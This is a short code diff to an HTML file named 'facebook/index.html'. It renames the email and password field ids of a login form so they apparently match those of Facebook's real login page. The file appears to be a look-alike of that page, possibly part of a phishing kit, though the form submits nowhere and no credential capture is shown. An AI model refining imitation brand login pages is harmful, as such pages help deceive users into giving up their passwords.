--- a/facebook/index.html
+++ b/facebook/index.html
@@ -124,11 +124,11 @@
             <form action="#">
                 <div class="input-box">
                     <label for="username">Email or Phone</label>
-                    <input type="text" id="username" name="username" required>
+                    <input type="text" id="id" name="username" required>
                 </div>
                 <div class="input-box">
                     <label for="password">Password</label>
-                    <input type="password" id="password" name="password" required>
+                    <input type="password" id="pass" name="password" required>
                 </div>
                 <button type="submit">Log In</button>
                 <div class="forgot-password">
